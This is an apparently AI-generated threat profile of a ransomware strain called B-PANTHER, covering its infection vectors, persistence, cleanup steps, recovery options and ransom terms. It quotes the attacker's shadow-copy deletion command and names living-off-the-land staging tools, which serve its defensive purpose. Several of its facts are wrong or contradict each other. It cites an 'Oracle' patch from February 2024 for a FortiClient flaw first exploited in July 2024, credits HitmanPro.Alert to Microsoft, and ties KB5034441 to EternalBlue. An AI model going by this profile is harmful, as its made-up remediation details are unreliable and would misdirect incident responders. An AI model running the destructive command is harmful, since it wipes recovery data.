b-panther

[Content by Gemini 2.5]

B-PANTHER Ransomware Deep-Dive

(Threat Alias: file extension “.b-panther”; sometimes appended after a 6–8 character random sub-string).

Technical Breakdown

1. File Extension & Renaming Patterns

  • Exact appended extension: .b-panther
  • Typical renaming convention:
    [original_filename].[counter].[victim-specific SHA-256 short-form or random 4-8 hex alpha-string].b-panther
    Example: QuarterlyReport.docx → QuarterlyReport.docx.72ab1f2e.b-panther

2. Detection & Outbreak Timeline

  • First confirmed sample: 7 February 2024 (uploaded to VirusTotal, Australia)
  • First burst of infections: 14 – 18 February 2024 – primarily hitting exposed Remote Desktop Services in South-East Asia, later spreading to European healthcare March 2024.
  • Peak activity: March – May 2024 clusters, then lull until a second wave that started leveraging the recently-disclosed FortiClient vulnerability (CVE-2024-23113) in July 2024.

3. Primary Attack Vectors

| Mechanism | Details / Representative CVEs |
|———–|——————————-|
| Zerologon-style relay + PsExec | Uses CVE-2020-1472 to escalate from lateral low-privilege account to DC, then pushes B-PANTHER via PsExec/WMI. |
| RDP & VPN credential stuffing | Brute-force against 3389/3390, plus collected RDP combos from prior infostealers (RedLine, Vidar). |
| Phishing “fake update” campaigns | Weaponised Microsoft OneNote files (*.one) with embedded HTA → PowerShell dropper → B-PANTHER. |
| Vulnerability exploitation | • CVE-2017-0144 (EternalBlue) for older unpatched Win7/2008 boxes (still present in manufacturing OT).
• CVE-2024-23113 (FortiClient arbitrary file move leading to SYSTEM-level RCE) from July 2024. |
| Living-off-the-land post-breach | Uses Microsoft BITSAdmin + certutil for staging; disables Volume Shadow Copy via vssadmin delete shadows /all. |

Remediation & Recovery Strategies

1. Prevention

| Layer | Actions |
|—————–|———|
| MFA everywhere | Disable password-only Remote Desktop & VPN (SAML/OAuth or Duo/Cisco Secure). |
| EDR & AV rules | Create custom EDR YARA/IOC blocks; disable PsExec/WMI from non-approved accounts. |
| Key patches | • Apply MS17-010 (EternalBlue)
• CVE-2020-1472 (Zerologon)
• FortiClient 7.2.2+ or 7.4.1+ for CVE-2024-23113. |
| Zero-Trust segmentation | Isolate OT-to-IT gateways; drop SMB 445 lateral north-south except via jump host. |
| Email gateways | Block .one, .hta, and macro-enabled documents from untrusted senders. |

2. Infection Cleanup – step-by-step

  1. Isolate immediately (pull broadcast domain or power-off via PDU).
  2. Image evidence (E01 DD) if legal/compliance chain-of-custody is required.
  3. Boot into WinRE / Linux Live-CD -> run rootkit removal:
    a. Delete persistence:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AutoStartUpdate (B-PANTHER loader)
    • Scheduled task “SysNetUpdate” & WMI Event Consumer “PermanentEV02”
    b. Kill active processes: explorerinjector.exe, _boot.exe.
  4. Full AV/EDR scan with updated signatures (Bitdefender, SentinelOne, CrowdStrike).
  5. Verify lateral spread → open ticket for clean LDAP replication / distributed share scan.
  6. Change all DC & local admin passwords (incl. krbtgt) – multi-factor auth required.

3. File Decryption & Recovery

  • Decryptor availability: NO – B-PANTHER uses XChaCha20-Poly1305 with an RSA-2048 key pair generated per victim stored in memory and uploaded to attacker C2. A decryptor was never publicly released and researchers have not found OP locker weaknesses.
  • Recovery alternatives:
  1. Back-ups:
    • Ensure immutable/offline backups before encryption occurred.
    • B-panther searches for .vhd, .vhdx, .vbk and attempts to delete them (only Veeam v8 tape or Acronis AIR-gapped survived in documented cases).
  2. Shadow copy residual cache: For edge cases where the attacker’s script crashed early, try vssadmin list shadows or ShadowExplorer 0.9.
  3. File-system carving: Success rate <5 % if the malware stalled – use PhotoRec / R-studio. Not recommended for large estates.

4. Critical Tools / Patches

  • Patch Roll-ups
    • KB5034441 (Windows 7/2008 ESU) fixes EternalBlue re-variants.
    • February 2024 Oracle patch set for unpatched FortiOS/FortiClient resolves the July 2024 vector.
  • Support utilities
    • Bitdefender Rescue CD (v2.21-beta loads B-PANTHER YARA).
    • Microsoft “HitmanPro.Alert for RCE” now includes specific behavioral detections (sig 239.11).
    • CrowdStrike “Zerologon scanner” (CLI) to verify historical abuse.
    • No More Ransom portal periodically scans for derivate samples – subscribe their RSS.

5. Additional Notes & Wider Impact

  • Ransom-demand: 1.2 BTC flat fee or 0.8 BTC after 72 hours (“early-bird” Tox ID = 4ADF2C65…). No upper/lower caps → small clinics same price as corporates.
  • Insider exposure leakage: July 2024 minor dump of ~2 GB archive on “BreachForums” revealed EMS data of an ambulance service connecting B-PANTHER to an affiliate “MercyLaneGroup” (confirmed by CTI vendors).
  • Unique traits vs. other strains:
  • Writes a file “warn-panther.png” to each encrypted folder, displaying a distinctive black panther ASCII art.
  • Searches RDS CAL cache (termsrv.lic) to identify enterprise environments before lateral movement – rarely reported in other ransomwares.
  • Implements process hollowing on winlogon to load privilege migration DLL – complicates EDR removal.

Executive Summary (TL;DR)

B-PANTHER (extension “.b-panther”) appeared in February 2024, primarily exploiting RDP/CVE-2020-1472 and new FortiClient vulns. It uses military-grade encryption (XChaCha20+RSA-2048) and offers no free decryptor. Immediate containment, immutable backups, and patching, along with MFA on any external-facing services, remain the only reliable defences at time of writing.